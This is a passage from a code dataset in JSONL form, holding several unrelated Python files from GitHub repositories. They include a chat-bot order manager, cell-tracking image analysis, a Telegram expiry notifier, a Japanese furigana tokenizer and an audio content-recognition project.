return None\n\n if not self.preo_db.is_room_order_enable(room_id):\n # Room order is not enabled.\n print(\"Error: room order %s is not enabled\" % (room_id))\n return Response.text(Response.REP_ORDERLIST_ALREADY_CLOSED)\n if not self.preo_db.get_order_by_user_item(room_id, user_name, item_name):\n # Item does not exist.\n print(\"Error: item %s for %s does not exist in %s\" % (item_name, user_name, room_id))\n return Response.text(Response.REP_DEL_NOT_EXIST_ITEM, user_name, item_name)\n\n self.preo_db.del_order(room_id, user_name, item_name)\n return Response.text(Response.REP_DEL_ITEM, user_name, item_name)\n\n def list_order(self, room_id):\n room_order = self.preo_db.get_room_order(room_id)\n if room_order == None:\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n order_list = self.preo_db.get_order_by_room(room_id)\n text = self.__order_list_to_str(order_list)\n return Response.text(Response.REP_SUMMARY_ORDERLIST, room_order.list_name, text)\n\n def close_order(self, room_id):\n if not self.preo_db.is_room_order_exist(room_id):\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n if not self.preo_db.is_room_order_enable(room_id):\n # Room order has already been disabled.\n return Response.text(Response.REP_ORDERLIST_ALREADY_CLOSED)\n\n self.preo_db.disable_room_order(room_id)\n return Response.text(Response.REP_ORDERLIST_CLOSED)\n\n def open_order(self, room_id):\n if not self.preo_db.is_room_order_exist(room_id):\n # Room order has not been created yet.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n if self.preo_db.is_room_order_enable(room_id):\n # Room order has already been enabled.\n return Response.text(Response.REP_ORDERLIST_ALREADY_OPENED)\n\n self.preo_db.enable_room_order(room_id)\n return Response.text(Response.REP_OPEN_ORDERLIST)\n\n def is_order_opened(self, room_id):\n if not self.preo_db.is_room_order_exist(room_id):\n # Room order has not been created.\n return False\n\n return self.preo_db.is_room_order_enable(room_id)\n\n def end_order(self, room_id):\n room_order = self.preo_db.get_room_order(room_id)\n if room_order == None:\n # Room order has not been created.\n print(\"Error: room order %s does not exist\" % (room_id))\n return None\n\n order_list = self.preo_db.get_order_by_room(room_id)\n text = self.__order_list_to_str(order_list)\n self.preo_db.del_room_order(room_id)\n\n return Response.text(Response.REP_END_ORDERLIST, room_order.list_name, text)\n\n @staticmethod\n def __order_print_user_item_amount(order):\n return \"%s: %s %s\" % (order.user_name, order.item_name, order.amount)\n\n @staticmethod\n def __order_list_to_str(order_list):\n # Creating a dict mapping item name into a list of text list and total maount\n # ex. \"milk\" : ([\"user1\", \"user3(2)\"], 3)\n order_dict = {}\n for order in order_list:\n item_name = order.item_name\n amount = order.amount\n text = order.user_name if amount == 1 else \"%s(%d)\" % (order.user_name, amount)\n if item_name in order_dict:\n order_dict[item_name][0].append(text)\n order_dict[item_name][1] += amount\n else:\n order_dict[item_name] = [[text], amount]\n\n order_text = \"\"\n for item_name, args in order_dict.items():\n order_text += \"%s %d: %s\\n\" % (item_name, args[1], \" \".join(args[0]))\n return order_text.strip()\n\n\"\"\" deprecated code use for reference\nclass Order:\n def __init__(self, name):\n self.name = name\n self.enable = True\n self.order_by_menu = {}\n self.order_by_user = {}\n\n def add_order(self, user, menu, amount=1):\n if self.enable:\n return Response.text(Response.REP_NOT_IMPLEMENT)\n else:\n return Response.text(Response.REP_ORDERLIST_CLOSED, self.name)\n\n def del_order(self, user, menu, amount=-1):\n if self.enable:\n return Response.text(Response.REP_NOT_IMPLEMENT)\n else:\n return Response.text(Response.REP_ORDERLIST_CLOSED, self.name)\n\n def set_enable(self, flag):\n self.enable = flag\n\n def order_by_menu_string(self):\n text = \"\"\n for menu, amount in self.order_by_menu:\n text += \"%s %d\" % (menu, amount) + \"\\n\"\n return text[:-1]\n\n def order_by_user_string(self):\n text = \"\"\n for user, order in self.order_by_user:\n text += user + \"\\n\"\n for menu, amount in order:\n text += menu + \" \" + amount + \"\\n\"\n return text[:-1]\n\n def list_order_by_menu(self):\n return Response.text(Response.REP_ORDER_PRINT, self.name, self.order_by_menu_string)\n\n def list_order_by_user(self):\n return Response.text(Response.REP_ORDER_PRINT, self.name, self.order_by_user_string)\n\n def __str__(self):\n return self.order_by_user_string()\n\"\"\"\n","repo_name":"mexeniz/preo-bot","sub_path":"bot/roomorder.py","file_name":"roomorder.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"25220910663","text":"data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# for文を使って合計を求める\ntotal = 0\nfor h in data:\n total += h\n\nprint(total)\n\n# data の中から偶数だけ表示する\nfor a in data:\n if a % 2 == 0:\n print(a)","repo_name":"s16009/PythonTutorial","sub_path":"hukusyu/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10098266153","text":"import numpy as np\nimport diplib as dip\nfrom diplib import PyDIPjavaio\nimport math\n\nfrom util.common_util import CommonUtil\nfrom util.image_util import ImageUtil\nfrom util.plot_util import PlotUtil\nfrom all_asm.asm4.model.cell import Cell\n\n\n# Save images that display past and current center position of every selected cell\ndef save_image_cell_movement_per_transition(image_sizes_values, x_1_value, y_1_value, x_2_value, y_2_value, series_name, cells_list, sequence_number):\n # Create new empty image\n selected_cell_image = dip.Image((image_sizes_values[0], image_sizes_values[1]), 1)\n selected_cell_image.Fill(0)\n\n # Draw past position and current position of cell\n dip.DrawBox(selected_cell_image, [1, 1], [x_1_value, y_1_value])\n dip.DrawBox(selected_cell_image, [2, 2], [x_2_value, y_2_value])\n\n CommonUtil.save_image_to_default_project_folder(selected_cell_image, \"asm4\",\n \"track_\" + series_name + \"_\" + cells_list[\n i].cell_display_name + \"_from_\" + str(\n sequence_number - 1) + \"_to_\" + str(sequence_number) + \".tif\")\n\n\n# Segment to retrieve brightest cells in image\ndef segment_brightest_cells(img, image_file_name):\n img = dip.ContrastStretch(img, 97, 100)\n\n print(img.Sizes())\n\n segm_img = ImageUtil.segment_image_white(img)\n\n print(segm_img.Sizes())\n\n file_name = image_file_name + '_segmented.tif'\n CommonUtil.save_image_to_default_project_folder(segm_img, \"asm4\", file_name)\n\n labeled_img = dip.Label(segm_img, boundaryCondition=[\"remove\"])\n\n return labeled_img\n\n\n# Save image that shows all initial center positions of selected cells\ndef save_image_initial_selection(sorted_measurements, image_name):\n # Create new empty image\n selected_cells_image = dip.Image((image_sizes[0], image_sizes[1]), 1)\n selected_cells_image.Fill(0)\n\n for i in range(15):\n # Get coordinates of centers of current cell\n x_coord = sorted_measurements[i][2]\n y_coord = sorted_measurements[i][3]\n # Draw center of current cell\n dip.DrawBox(selected_cells_image, [2, 2], [x_coord, y_coord])\n\n CommonUtil.save_image_to_default_project_folder(selected_cells_image, \"asm4\", image_name)\n\n\ndef create_new_empty_images_for_selected_cells(image_sizes_values):\n image_list = []\n\n for _ in range(15):\n new_image = dip.Image((image_sizes_values[0], image_sizes_values[1]), 1)\n new_image.Fill(0)\n image_list.append(new_image)\n\n return image_list\n\n\ndef save_movement_images_selected_cells_series(image_series, series_name):\n for i in range(15):\n CommonUtil.save_image_to_default_project_folder(image_series[i], \"asm4\", \"track_\" + series_name + \"_cell\" + str(i) + \".tif\")\n\n\nif __name__ == '__main__':\n input_dir: str = CommonUtil.obtain_project_default_input_dir_path() + 'asm4/'\n\n image_series_names = ['MTLn3+EGF', 'MTLn3-ctrl']\n\n for image_series_name in image_series_names:\n\n first_image = ImageUtil.obtain_diplib_image(image_series_name + '0000.png', input_dir)\n image_sizes = first_image.Sizes()\n\n selected_cells = []\n\n images_movement_trajectories_list = create_new_empty_images_for_selected_cells(image_sizes)\n\n for sequence in range(30):\n image_file_name = image_series_name + str(sequence).zfill(4)\n curr_img = ImageUtil.obtain_diplib_image(image_file_name + '.png', input_dir)\n\n # Segment to get only brightest cells in foreground\n labeled_img = segment_brightest_cells(curr_img, image_file_name)\n\n # Measure size and centers of cells\n measurements = np.array(dip.MeasurementTool.Measure(labeled_img, curr_img, ['Size', 'Perimeter', 'Center']))\n # Sort array based on size of cells (descending)\n sorted_measurements = np.flipud(measurements[np.argsort(measurements[:, 0])])\n\n # First image of the series\n if sequence == 0:\n save_image_initial_selection(sorted_measurements, image_file_name + '_initial_selection.tif')\n\n for i in range(15):\n size = sorted_measurements[i][0]\n perimeter = sorted_measurements[i][1]\n\n x_coord = sorted_measurements[i][2]\n y_coord = sorted_measurements[i][3]\n\n current_cell = Cell(i)\n current_cell.cell_display_name = \"cell\" + str(i)\n current_cell.x_y_coord_tuple = (x_coord, y_coord)\n current_cell.perimeter = perimeter\n current_cell.area = size\n\n selected_cells.append(current_cell)\n\n # Draw square for starting position of current selected cell\n dip.DrawBox(images_movement_trajectories_list[i], [4, 4], [x_coord, y_coord])\n\n # Consecutive images of the series\n else:\n for i in range(len(selected_cells)):\n # print(selected_cells[i].cell_display_name, \", \", selected_cells[i].area, \", \", selected_cells[i].perimeter, \", \", selected_cells[i].cell_xy_coord_tuple)\n\n # Past position\n x_1 = selected_cells[i].x_y_coord_tuple[0]\n y_1 = selected_cells[i].x_y_coord_tuple[1]\n\n # Save lowest euclidean distance\n lowest_eucl_dist = image_sizes[0]\n # Save index of cell information with lowest euclidean distance\n index_lowest_dist = 0\n\n for j in range(len(sorted_measurements)):\n x_2 = sorted_measurements[j][2]\n y_2 = sorted_measurements[j][3]\n\n eucl_dist = math.sqrt((x_2 - x_1)**2 + (y_2 - y_1)**2)\n\n if eucl_dist < lowest_eucl_dist:\n lowest_eucl_dist = eucl_dist\n index_lowest_dist = j\n\n # print(sorted_measurements[index_lowest_dist])\n\n # Current position\n x_2 = sorted_measurements[index_lowest_dist][2]\n y_2 = sorted_measurements[index_lowest_dist][3]\n\n selected_cells[i].x_y_coord_tuple = (x_2, y_2)\n selected_cells[i].area = sorted_measurements[index_lowest_dist][0]\n selected_cells[i].perimeter = sorted_measurements[index_lowest_dist][1]\n\n dip.DrawLine(images_movement_trajectories_list[i], [int(x_1), int(y_1)], [int(x_2), int(y_2)])\n\n # save_image_cell_movement_per_transition(image_sizes, x_1, y_1, x_2, y_2, image_series_name, selected_cells, sequence)\n\n save_movement_images_selected_cells_series(images_movement_trajectories_list, image_series_name)\n\n\n\n\n\n\n","repo_name":"wilsonwcyiu/210418_iaim_group_asm","sub_path":"all_asm/asm4/segm_test_rosa.py","file_name":"segm_test_rosa.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30785143569","text":"import datetime as dt\n\nimport telegram\n\nfrom . import logger\nfrom .config import TelegramConfig\nfrom .utils import pd\n\n\nbot = telegram.Bot(token=TelegramConfig.TELEGRAM_TOKEN)\n# Название столбца для даты\nEXPIRY_DATE_NAME = \"expires_in\"\n# Название столбца для отправки в бот в случае просрочки\nORDER_NAME = \"order_name\"\n\n\ndef send_message(bot, message):\n \"\"\"Функция отправки сообщения в бот.\"\"\"\n try:\n bot.send_message(chat_id=TelegramConfig.TELEGRAM_CHAT_ID, text=message)\n except telegram.error.TelegramError as error:\n logger.error(f\"Сбой отправки: {error}\")\n else:\n logger.debug(f\"Отправленно сообщение: {message}\")\n\n\ndef find_expired_in_timedelta(data_dict, current_date):\n \"\"\"Поиск заказов с истекшим сроком\"\"\"\n clients_list = []\n for row, expiry_date_timestamp in data_dict.get(EXPIRY_DATE_NAME).items():\n expiry_date = pd.to_datetime(expiry_date_timestamp).date()\n if current_date > expiry_date:\n clients_list.append(row)\n\n return clients_list\n\n\ndef prepare_message_with_clients(data_dict, clients_list):\n \"\"\"Подготовка сообщения с клиентами из списка\"\"\"\n message = \"\"\n if len(clients_list):\n for number in clients_list:\n client_name = data_dict.get(ORDER_NAME).get(number)\n expiry_date = data_dict.get(EXPIRY_DATE_NAME).get(number)\n message += (\n f\"Order number {client_name}.\" f\" expiry date: {expiry_date}\\n\"\n )\n\n return message\n\n\ndef check_expires_dates(data):\n \"\"\"Точка входа для ботавызывается из tasks.py\"\"\"\n current_date = dt.date.today()\n data_dict = data.to_dict()\n try:\n orders_list = find_expired_in_timedelta(data_dict, current_date)\n new_message = prepare_message_with_clients(data_dict, orders_list)\n if new_message == \"\":\n new_message = f\"Today {current_date} there are no expiring orders\"\n send_message(bot, new_message)\n except Exception as error:\n new_message = f\"Bot task finished with error: {error}\"\n send_message(bot, new_message)\n","repo_name":"Bigbrotherx/Order_controller","sub_path":"order_controll_app/backend/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39022504604","text":"# Mouse locator\n\nimport pyautogui\nimport time\nprint(\"Ctrl + C to close\")\ntry:\n while True:\n x, y = pyautogui.position()\n pix = pyautogui.screenshot().getpixel((x, y))\n for_print = 'X:' + str(x).rjust(4) + ' Y:' + str(y).rjust(4)\n for_print += ' RGB: (' + str(pix[0]).rjust(3) + ',' + \\\n str(pix[1]).rjust(3) + ',' + str(pix[2]).rjust(3) + ')'\n print(for_print, end='')\n print('\\b' * len(for_print), end='', flush=True)\nexcept KeyboardInterrupt:\n print('\\nBye!')\n exit()\n","repo_name":"rhaeyx/sheets","sub_path":"mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71057525533","text":"S = str(input())\nS = list(S)\n\nl_count = 0\nif (S[0] != \"A\") or ('C' not in S[2:-1]) or (\"C\" in S[:1] or \"C\" in S[-1]):\n print(\"WA\")\nelse:\n for i in S:\n if i.isupper():\n l_count += 1\n \n if l_count != 2:\n print(\"WA\")\n else:\n print(\"AC\")\n\n","repo_name":"EduardoFMC/UNB","sub_path":"prog/python/tep 2020.1/lista 1/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33758432666","text":"#!/usr/bin/env python\n\"\"\"Pre-commit hook for PyASTrix.\n\n\"\"\"\n\nimport subprocess\nimport sys\n\nif __name__ == \"__main__\":\n files = [\n f for f in sys.argv if any(\n [f.endswith(f\".{ext}\") for ext in (\"yaml\", \"yml\", \"py\")]\n )\n ]\n if len(files) == 0:\n print(\"No files to check\")\n exit(0)\n commands = [\"pyastrx\", \"-l\", \"-f\", *files]\n if \"-q\" in sys.argv:\n commands.append(\"-q\")\n process = subprocess.Popen(\n commands,\n shell=True\n )\n process.communicate()\n exit_code = process.wait()\n\n sys.exit(exit_code)\n","repo_name":"pyastrx/pyastrx","sub_path":".pre-commit-hook/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"32"} +{"seq_id":"17921507077","text":"import fugashi\nimport jaconv\n\n\ndef convert_furigana(tagger, text):\n words = tagger(text)\n output = list()\n for word in words:\n\n word_dict = dict()\n word_dict['surface'] = word.surface\n output.append(word_dict)\n\n if word.feature.goshu == '記号' or word.feature.pos1 == '代名詞' or word.feature.pos2 == '固有名詞':\n continue\n\n if word.feature.pos1 == '接尾辞' or word.feature.pos2 == '数詞':\n continue\n\n if not word.feature.kana:\n continue\n\n hira = jaconv.kata2hira(word.feature.kana)\n if word.feature.kana != '' and hira != word.surface:\n word_dict['furi'] = jaconv.kata2hira(word.feature.kana)\n if word.surface != word.feature.lemma:\n word_dict['lemma'] = word.feature.lemma\n word_dict['orthBase'] = word.feature.orthBase\n word_dict['hiraBase'] = jaconv.kata2hira(word.feature.kanaBase)\n # '五段-ラ行'\n word_dict['cType'] = word.feature.cType\n # '動詞'\n word_dict['pos1'] = word.feature.pos1\n # '普通名詞', '一般'\n word_dict['pos2'] = word.feature.pos2\n\n return output\n\n\ndef get_i_adjectives(word_list):\n tagger = fugashi.Tagger()\n out_list = list()\n for word in word_list:\n tagged = tagger(word)\n # want to tag just one word only\n if len(tagged) != 1:\n continue\n if tagged[0].feature.cType == '形容詞':\n out_list.append(tagged[0].surface)\n return out_list\n\n\ndef get_na_adjectives(word_list):\n tagger = fugashi.Tagger()\n out_list = list()\n for word in word_list:\n tagged = tagger(word)\n # want to tag just one word only\n if len(tagged) != 1:\n continue\n if tagged[0].feature.pos1 == '形状詞':\n out_list.append(tagged[0].surface)\n return out_list\n\n\ndef get_verbs(word_list):\n tagger = fugashi.Tagger()\n out_list = list()\n for word in word_list:\n tagged = tagger(word)\n # want to tag just one word only\n if len(tagged) != 1:\n continue\n if tagged[0].feature.pos1 == '動詞':\n out_list.append(tagged[0].surface)\n return out_list\n","repo_name":"techckh/jp-tokenizer","sub_path":"src/jp_tokenizer/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24866312274","text":"name = input()\nprint(f\"hello, {name}!\")\n\n# Sequences \n\nname = 'Taqi' # Variable\nprint(name[0]) # first charcter in the string\n\n\ncoordinates = (10, 15.15, 'taqi') # Tuple\nprint(coordinates[0])\n\n\nname = [\"Taqi\", \"Turab\", \"Ali\"] # List multi data types\nprint(name[0])\n\n#Sets no duplicate items\n\ns = set()\ns.add(1)\ns.add(3)\ns.add(3) \nprint(s) # {1, 3}\n\n# Dictionary, key value date type\ndate = { 'name':'Taqi', 'age': 18} # dictionary\nprint(date['name'])\n\n# Looping\n\nfor i in range(10):\n\tprint(i) # 0,1,2,3,4,5,6,7,8,9\n\n\nnames = ['Taqi', 'Turab', 'Ali']\nfor name in names:\n\tprint(name) \n\n\n","repo_name":"ArchTaqi/cs50","sub_path":"Lecture.2.Flask/program1.py","file_name":"program1.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"72478724572","text":"from tensorflow.python.keras.models import load_model\nfrom settings import CURRENT_DATA_VERSION\nfrom src.features.helpers.data_load import get_train_source, get_model_name, get_train_val_test_data, get_model_type, \\\n get_img_train_val_test_data\nfrom src.features.helpers.metrics import get_f1\nfrom src.features.helpers.training import plot_prediction_results, get_model_path, plot_confusion_matrix\n\nML_MODEL = get_model_name()\n\nmodel_type = get_model_type()\n\ntrain_source = get_train_source()\n\nif CURRENT_DATA_VERSION == 'v4':\n x_train, y_train, x_val, y_val, x_test, y_test = get_img_train_val_test_data()\nelse:\n x_train, y_train, x_val, y_val, x_test, y_test = get_train_val_test_data(train_source, version=CURRENT_DATA_VERSION)\n\nmodel = load_model(\n get_model_path(model_type, ML_MODEL),\n custom_objects={'f1_score': get_f1()}\n)\ny_pred_train_classes = (model.predict(x_train) > 0.5).astype(\"int32\")\nplot_confusion_matrix(y_pred_train_classes, y_train, [0, 1], 'Training', ML_MODEL, model_type)\n\ny_pred_val_classes = (model.predict(x_val) > 0.5).astype(\"int32\")\nplot_confusion_matrix(y_pred_val_classes, y_val, [0, 1], 'Validation', ML_MODEL, model_type)\n\ny_pred_test_classes = (model.predict(x_test) > 0.5).astype(\"int32\")\nplot_confusion_matrix(y_pred_test_classes, y_test, [0, 1], 'Test', ML_MODEL, model_type)\n\nplot_prediction_results(\n y_pred_train_classes,\n y_train,\n y_pred_val_classes,\n y_val,\n y_pred_test_classes,\n y_test,\n ML_MODEL,\n model_type\n)\n","repo_name":"askoki/nfl_dpi_prediction","sub_path":"src/features/helpers/evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38242229674","text":"from Optimizer import *\n\nimport argparse\nimport time\n\nfrom datetime import timedelta\n\nparser = argparse.ArgumentParser(\n prog=\"ACR Project\",\n description=\"Automatic Content Recognition of songs in Hebrew.\",\n epilog=\"By Jonathan Eddie Amir for Tel Hai College.\"\n)\nparser.add_argument('-v', '--verbose', action='store_true')\nparser.add_argument('-p', '--path', default=OPTIONS[\"RecordingPath\"])\nparser.add_argument('-e', '--extension', default=OPTIONS[\"RecordingExtension\"])\nparser.add_argument('-sr', '--sample-rate', default=OPTIONS[\"SampleRate\"], type=Integer)\nparser.add_argument('-c', '--channels', default=OPTIONS[\"Channels\"], type=Integer)\nparser.add_argument('-n', '--num-fft', default=OPTIONS[\"NFFT\"], type=Integer)\nparser.add_argument('-l', '--hop-length', default=OPTIONS[\"HopLength\"], type=Integer)\nparser.add_argument('-w', '--window-length', default=OPTIONS[\"WindowLength\"], type=Integer)\nparser.add_argument('-th', '--threshold', default=OPTIONS[\"Threshold\"], type=Integer)\nparser.add_argument('-d', '--distance', default=OPTIONS[\"Distance\"], type=Integer)\n# TODO: Add new OPTIONS members.\nargs = parser.parse_args()\n\nif not OPTIONS[\"COLAB\"]:\n sd.default.samplerate = OPTIONS[\"SampleRate\"] # Currently unused, as we know each file's sample rate\n sd.default.channels = OPTIONS[\"Channels\"] # Set sound-device's default to Stereo\n\n\n# Utilities\ndef example_load() -> (plt.Figure, plt.Axes):\n \"\"\"\n Loads the 'choice' and 'nutcracker' example file from the librosa example library as Track instances.\n\n :return: Plotted figure & axes\n :rtype: (plt.Figure, plt.Axes)\n \"\"\"\n _track1 = Track(librosa.ex('choice', hq=True))\n _track2 = Track(librosa.example('nutcracker'))\n _fig, _axs = plt.subplots(2, 2)\n _track1.plot_stft_and_constellation(axs=_axs[0], fig=_fig)\n _track2.plot_stft_and_constellation(axs=_axs[1], fig=_fig)\n return _fig, _axs\n\n\n# Main Program\ndef main() -> Return:\n \"\"\"\n The Main() function. Provides a user interface for the program.\n\n :return: Did the function complete successfully?\n :rtype: Return\n \"\"\"\n # Variables\n print(\"Hello! Welcome to the ACR Project!\")\n running = True\n\n # Commands\n def load() -> Return:\n \"\"\"Initialize a demo Track list.\"\"\"\n # nonlocal database\n _input = input(\"Would you like to import a song directory into the database? [y]es / [n]o: \")\n if _input.lower() in [\"true\", \"t\", \"yes\", \"y\"]:\n OPTIONS[\"DatabasePath\"] = input(\"Please specify the path to the directory of songs: \")\n cache_database_by_track()\n print(\"Database loaded successfully!\")\n else:\n _input = input(\"Please specify the path to the cache file you want added to the database: \")\n try:\n _temp: HashSet = load_from_pickle(_input)\n database.append_hashes(_temp)\n print(\"Cache loaded successfully!\")\n except FileNotFoundError:\n print(\"File not found, please try again later.\")\n return Return.FILES_ERROR\n return Return.SUCCESS\n\n def terminate() -> Return:\n \"\"\"Terminate the program.\"\"\"\n nonlocal running\n # stop()\n running = False\n return Return.SUCCESS\n\n # def play() -> Return:\n # \"\"\"Play a Track by ID from user.\"\"\"\n # print(\"Available Tracks:\")\n # for _i in range(len(database)):\n # print(f\"{_i}: {database[str(_i)].title}\")\n # _track_title = input(\"Please enter Track title:\")\n # try:\n # if _track_title == \"\":\n # print(\"Cancelling...\")\n # return Return.CANCEL\n # _track: Track = database[_track_title]\n # _track.play()\n # return Return.SUCCESS\n # except ValueError:\n # print(\"Not a valid Track title. Please try again.\")\n # return Return.VALUE_ERROR\n # # except IndexError:\n # # print(\"Track ID out of range. Please try again.\")\n # # return Return.INDEX_ERROR\n # except sd.PortAudioError:\n # print(\"Error playing Track. Please try again.\")\n # return Return.AUDIO_ERROR\n # pass\n #\n # def stop() -> Return:\n # \"\"\"Stop playing all currently playing audios on sound-device.\"\"\"\n # if OPTIONS[\"COLAB\"]:\n # return Return.COLAB_ERROR\n # sd.stop()\n # return Return.SUCCESS\n\n def record(wait: bool = True, save: bool = True, add: bool = False,\n ext: AnyStr = OPTIONS[\"RecordingExtension\"]) -> Return:\n \"\"\"Record from sound-device.\"\"\"\n if OPTIONS[\"COLAB\"]:\n print(\"This functionality is unavailable for Google Colab. Please use a sample file, instead.\")\n return Return.COLAB_ERROR\n try:\n _duration = float(\n input(f\"Please enter recording Duration (seconds, Default={OPTIONS['DefaultDuration']}):\") or OPTIONS[\n \"RecordingDuration\"])\n except ValueError:\n print(\"Duration invalid. Please try again.\")\n return Return.VALUE_ERROR\n if OPTIONS[\"SampleRate\"] is None:\n try:\n _sr = int(input(f\"Please enter Sample Rate (Hz, Default={OPTIONS['DefaultSampleRate']}):\") or OPTIONS[\n \"SampleRate\"])\n except ValueError:\n print(\"Sample Rate invalid. Please try again.\")\n return Return.VALUE_ERROR\n else:\n _sr = OPTIONS[\"SampleRate\"]\n _recording = sd.rec(int(_duration * _sr))\n if wait:\n sd.wait() # Wait for recording to finish.\n _track = Track(f'{OPTIONS[\"RecordingPath\"]}/Recording - {timestamp()}.{OPTIONS[\"RecordingExtension\"]}')\n _track._sr = _sr\n _track._y = _recording\n if save:\n if not os.path.exists(OPTIONS[\"RecordingPath\"]):\n # Create \"Recordings\" folder if one does not exist. (SoundFile can't mkdir)\n os.mkdir(OPTIONS[\"RecordingPath\"], mode=OPTIONS[\"MakeDirMode\"])\n sf.write(f\"{_track.title}.{ext}\", _track.y, _track.sr) # Save recording to file.\n # TODO: Soundfile takes a while to save the recording - is it possible to block Python in the meantime?\n if add:\n database.append(_track) # TODO: Make sure this works.\n return Return.SUCCESS\n\n def append() -> Return:\n \"\"\"Append a new Track to the database using soundfile.\"\"\"\n _path = input(\"Please enter the filepath of the Track you would like to add (.wav, 44100Hz SR): \")\n if sf.check_format(_path):\n _track = Track(_path)\n database.append(_track)\n return Return.SUCCESS\n return Return.FILES_ERROR\n\n def match() -> Return:\n \"\"\"Search for a Track using a Sample soundfile.\"\"\"\n _path = input(\"Please enter the filepath of the Sample you would like to search with (.wav, 44100Hz SR): \")\n # if sf.check_format(_path):\n _track = Track(_path)\n _hashes = _track.hashes\n _title = database.match_from_sample(sample=_hashes)\n print(f\"Match Found! {_title}\")\n return Return.SUCCESS\n # return Return.INDEX_ERROR # No match found.\n\n def optimize() -> Return:\n \"\"\"Optimizes various window parameters.\"\"\"\n print(\"Please wait while optimizing...\")\n best_params, best_score = optimize_parameters()\n print(\"Training Results:\", best_params, best_score)\n return Return.SUCCESS\n\n # Command List\n _commands = dict()\n for _command in [load, terminate, record, append, match, optimize]: # play, stop TODO: Add all commands here!\n _commands[_command.__name__] = _command\n\n # Main Loop\n while running:\n print(\"\\nAvailable Commands:\")\n print(list(_commands.keys()))\n _command_name = input(\"Please enter a command:\").lower() # Case-insensitive.\n if _command_name not in _commands.keys():\n print(\"Command not found. Please try again.\")\n continue\n _status_code = _commands[_command_name]() # TODO: Handle status code\n print(\"Goodbye!\")\n return Return.SUCCESS\n\n\n# TODO:\n# COMPLETE: Change Sample Rate -> Higher SR = shorter higher pitch\n# COMPLETE: Experiment with cross-referencing librosa, soundfile, python-sounddevice -> All are based on NumPy.\n# COMPLETE: Basic Menu -> Currently good-faith programmer-only.\n# COMPLETE: Playback -> Not tested with relative/absolute path.\n# COMPLETE: Recording (python-sounddevice = NumPy / pyaudio = byte) -> Used python-sounddevice, as it's based on NumPy.\n# COMPLETE: Change STFT window size\n# COMPLETE: Initial database -> Ripped Home CDs, will rip friends' CDs in the future.\n# COMPLETE: Options struct\n# COMPLETE: Show patch as window (8x8, 3x3, ...). Use np.max. Control target area / k parameters. (5 sec, 1024 bins)\n# COMPLETE: Window - 140ms ~ 500ms, ~10 in range, histogram points in window, threshold,\n# IN PROGRESS: Play with peak_find parameters to affect Constellation.\n# NOTE: Mode5, MDA256, CRC checksum\n# NOTE: matlab find, SIMD, parameter sweep, scipy research\n\nif __name__ == \"__main__\":\n database: HashDatabase = HashDatabase() # Extracted for debugging purposes\n if not OPTIONS[\"DEBUG\"]:\n try:\n database = load_from_pickle(os.path.join(OPTIONS[\"CachePath\"], OPTIONS[\"CacheFile\"]))\n except FileNotFoundError:\n print(\"No cache found, proceeding with empty database...\")\n main()\n else:\n print(f\"Starting! {timestamp()}\")\n track: Track = Track(OPTIONS[\"FullFile\"])\n start: Float = time.time()\n cached: bool = OPTIONS[\"CACHED\"]\n titles: List[AnyStr] = get_titles(cached) if cached else cache_database_by_track(OPTIONS[\"DatabasePath\"], True)\n titles = get_titles()\n hashes = {}\n for filename in os.listdir(OPTIONS[\"DatabasePath\"]):\n if not filename.endswith(OPTIONS[\"RecordingExtension\"]):\n continue\n print(f\"Hashing {filename}...\")\n track = Track(os.path.join(f'{OPTIONS[\"DatabasePath\"]}/{filename}'))\n _hashes = track.hashes # hashes_from_cached_constellation(title)\n for key in _hashes:\n if key not in hashes:\n hashes[key] = {}\n for _title in _hashes[key]:\n hashes[key][_title] = _hashes[key][_title]\n save_as_pickle(\"Hashes.pkl\", hashes)\n # tracklist: TrackList = tracklist_from_directory()\n runtime: Float = time.time() - start\n print(f\"Done! {timedelta(seconds=runtime)} = {len(titles)} songs loaded!\")\n","repo_name":"djohoe28/ACR_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29955256958","text":"import cv2\r\nimport numpy as np\r\nfrom PIL import ImageFont, ImageDraw, Image\r\n\r\n# 讀取圖片\r\n'''\r\nm1 = cv2.imread(\"1.jpg\", 1) #後面的0-2就是黑到白 灰階\r\n# m1 = cv2.cvtColor(m1, cv2.COLOR_BGR2HSV) #BGR轉HSV\r\nm2 = cv2.cvtColor(m1, cv2.COLOR_BGR2GRAY)\r\n# m2 = cv2.cvtColor(m1, cv2.COLOR_BGR2GRAY) #BGR轉灰階 \r\n# m1 = cv2.cvtColor(m1, cv2.COLOR_GRAY2BGR) #GRAY轉BGR\r\ncv2.imwrite(\"2.jpg\", m2)\r\n#畫質不影響的話就用png\r\ncv2.imwrite(\"8.jpg\", m2, 